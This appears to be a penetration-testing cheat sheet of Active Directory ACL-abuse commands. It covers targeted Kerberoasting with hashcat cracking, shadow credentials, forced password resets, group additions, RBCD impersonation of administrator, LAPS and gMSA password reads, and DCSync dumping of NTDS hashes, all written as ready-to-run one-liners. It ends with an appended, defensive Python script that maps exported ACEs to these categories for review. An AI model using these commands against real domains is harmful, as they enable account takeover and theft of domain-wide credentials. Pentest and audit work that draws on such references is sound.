ACL

    GenericWrite

    Targeted Kerberoasting

    python targetedKerberoast.py -v -d <domain> -u <username> -p <password>
    
    hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
    

    Shadow Credentials

    certipy shadow auto -u <username>@<domain> -p <password> -account <target_username> -dc-ip <ip>
    

    Using Kerberos

    certipy shadow auto -username <username>@<domain> -p <password> -k -account <target_username> -target <dc>
    

    GenericAll

    Password Change

    net rpc password <username> <new_password> -U <domain>/<username>%<hash> -S <dc> --pw-nt-hash
    

    Addmem

    net rpc group addmem <target_group> <username> -U <domain>/<username> -S <dc>
    

    RBCD

    rbcd.py -delegate-from '<machine_name>' -delegate-to '<target>' -dc-ip <ip> -action 'write' '<domain>/<username>:<password>'
    
    getST.py -spn 'cifs/<dc>' -impersonate administrator -dc-ip <ip> '<domain>/<machine_name>:<password>'
    
    export KRB5CCNAME=administrator.ccache
    

    ForceChangePassword

    net rpc password <TargetUser> <new_password> -U <domain>/<ControlledUser>%<Password> -S <DomainController>
    
    net rpc password <username> <new_password> -U <domain>/<username>%<hash> -S <dc> --pw-nt-hash
    
    bloodyAD --host <ip> -d <dc> -u <username> -p <password> set password <target_username> <new_password>
    
    python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>
    

    AddMember

    net rpc group addmem <target_group> <username> -U <domain>/<username> -S <dc>
    

    WriteOwner

    owneredit.py -action write -new-owner <username> -target <group_name> <domain>/<username>:<password>
    
    dacledit.py -action 'write' -rights 'WriteMembers' -principal <username> -target-dn <dn> <domain>/<username>:<password>
    
    bloodyAD.py -d <domain> -u <username> -p <password> --host <dc> add groupMember <target_group> <username>
    
    AddKeyCredentialLink

    python3 pywhisker.py -d <domain> --dc-ip <ip> -u <username> -H :<hashes> --target <target_username> --action "add"
    
    certipy shadow auto -username <username>@<domain> -hashes :<hashes> -account <target_username>
    

    ReadLAPSPassword

    nxc smb <target> -u <username> -p <password> --laps
    

    ReadGMSAPassword

    nxc ldap <target> -u <username> -p <password> --gmsa
    

    DCSync

    secretsdump.py <dc> -k
    
    nxc smb <domain> -u <username> -p <password> --ntds
    
    nxc smb <domain> -k --use-kcache --ntds
    

    Resources

    • https://www.thehacker.recipes/ad/movement/dacl/
    • https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse

    Tools

    bloodyAD

    Adding a user to a group

    bloodyAD -d <domain> -u <username> -p <password> --host <dc> add groupMember <group_name> <username>
    

    Giving the user GenericAll

    bloodyAD -d <domain> -u <username> -p <password> --host <dc> add genericAll <dn> <username>
    

    Change User Password

    bloodyAD -d <domain> -u <username> -p <password> --host <dc> set password <target_username> <new_password>
    

    powerview.py

    powerview $domain/$username:'$password'@$domain -k
    
    PV > Get-DomainObjectAcl -Identity ServiceMGMT
    

    PowerView

    Find-InterestingDomainACL -ResolveGUIDS | ?{$_.IdentityReferenceName -match "username"}
    

    Or get everything in json format and jq it

    Find-InterestingDomainACL -ResolveGUIDS | ConvertTo-Json | Out-File acls.json
    
    cat acls.json | jq ' .[] | select (.IdentityReferenceName == "username")'
    

    Or

    cat acls.json | jq '.[]' -c | grep -i username | jq .
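The jq one-liners above find ACEs held by one principal. For an ACL review you usually want the opposite view: every non-admin principal and which of the categories on this page each of its ACEs maps to. The following is an added example, not part of this page or of PowerView; it reads the `acls.json` export produced by `Find-InterestingDomainACL -ResolveGUIDS | ConvertTo-Json`, and the field names and resolved `ObjectAceType` spellings (`Member`, `User-Force-Change-Password`, `ms-Mcs-AdmPwd`, `DS-Replication-Get-Changes-All`, ...) are assumptions about that output; the sample records are constructed.

```python
import json
from collections import defaultdict

# (ActiveDirectoryRights token, resolved ObjectAceType) -> ACL category used on this page.
# ObjectAceType names are assumed to match PowerView -ResolveGUIDs; None = any object type.
RIGHT_CATEGORIES = {
    ("GenericAll", None): "GenericAll",
    ("GenericWrite", None): "GenericWrite",
    ("WriteOwner", None): "WriteOwner",
    ("WriteDacl", None): "WriteDacl",
    ("ExtendedRight", "user-force-change-password"): "ForceChangePassword",
    ("WriteProperty", "member"): "AddMember",
    ("WriteProperty", "ms-ds-key-credential-link"): "AddKeyCredentialLink",
    ("ExtendedRight", "ms-mcs-admpwd"): "ReadLAPSPassword",
    ("ExtendedRight", "ds-replication-get-changes"): "DCSync",
    ("ExtendedRight", "ds-replication-get-changes-all"): "DCSync",
}

def classify(ace):
    """Return the set of categories one ACE grants (empty if none of interest)."""
    rights = {r.strip() for r in ace.get("ActiveDirectoryRights", "").split(",")}
    obj = (ace.get("ObjectAceType") or "None").lower()  # "None" = untyped ACE
    # An untyped WriteProperty/ExtendedRight ACE covers every attribute or control right,
    # so it matches each typed entry for that right.
    return {cat for (right, wanted), cat in RIGHT_CATEGORIES.items()
            if right in rights and (wanted is None or obj == "none" or wanted == obj)}

def triage(acl_json, ignore=("Domain Admins", "Enterprise Admins", "Administrators", "SYSTEM")):
    """Group allow ACEs by holder: {principal: ['Category -> ObjectDN', ...]}."""
    report = defaultdict(set)
    for ace in json.loads(acl_json):
        who = ace.get("IdentityReferenceName", "?")
        if who in ignore or ace.get("AceQualifier") == "AccessDenied":
            continue
        for cat in classify(ace):
            report[who].add(f"{cat} -> {ace.get('ObjectDN', '?')}")
    return {who: sorted(v) for who, v in report.items()}

def mk_ace(dn, rights, obj, who, qual="AccessAllowed"):
    """One constructed ACE record in the shape ConvertTo-Json produces."""
    return {"ObjectDN": dn, "ActiveDirectoryRights": rights, "ObjectAceType": obj,
            "AceQualifier": qual, "IdentityReferenceName": who}

SAMPLE_ACL_JSON = json.dumps([  # constructed sample export, not real data
    mk_ace("CN=ServiceMGMT,OU=Groups,DC=corp,DC=local", "WriteProperty", "Member", "svc_helpdesk"),
    mk_ace("CN=jdoe,CN=Users,DC=corp,DC=local", "ExtendedRight", "User-Force-Change-Password", "svc_helpdesk"),
    mk_ace("CN=WS01,OU=Workstations,DC=corp,DC=local", "ReadProperty, ExtendedRight", "ms-Mcs-AdmPwd", "Helpdesk"),
    mk_ace("DC=corp,DC=local", "ExtendedRight", "DS-Replication-Get-Changes-All", "Domain Admins"),
    mk_ace("CN=jdoe,CN=Users,DC=corp,DC=local", "GenericAll", "None", "Guests", "AccessDenied"),
])
```

Run `triage(open("acls.json").read())` against a real export; deny ACEs and the built-in admin groups are skipped so the output is only the unexpected holders.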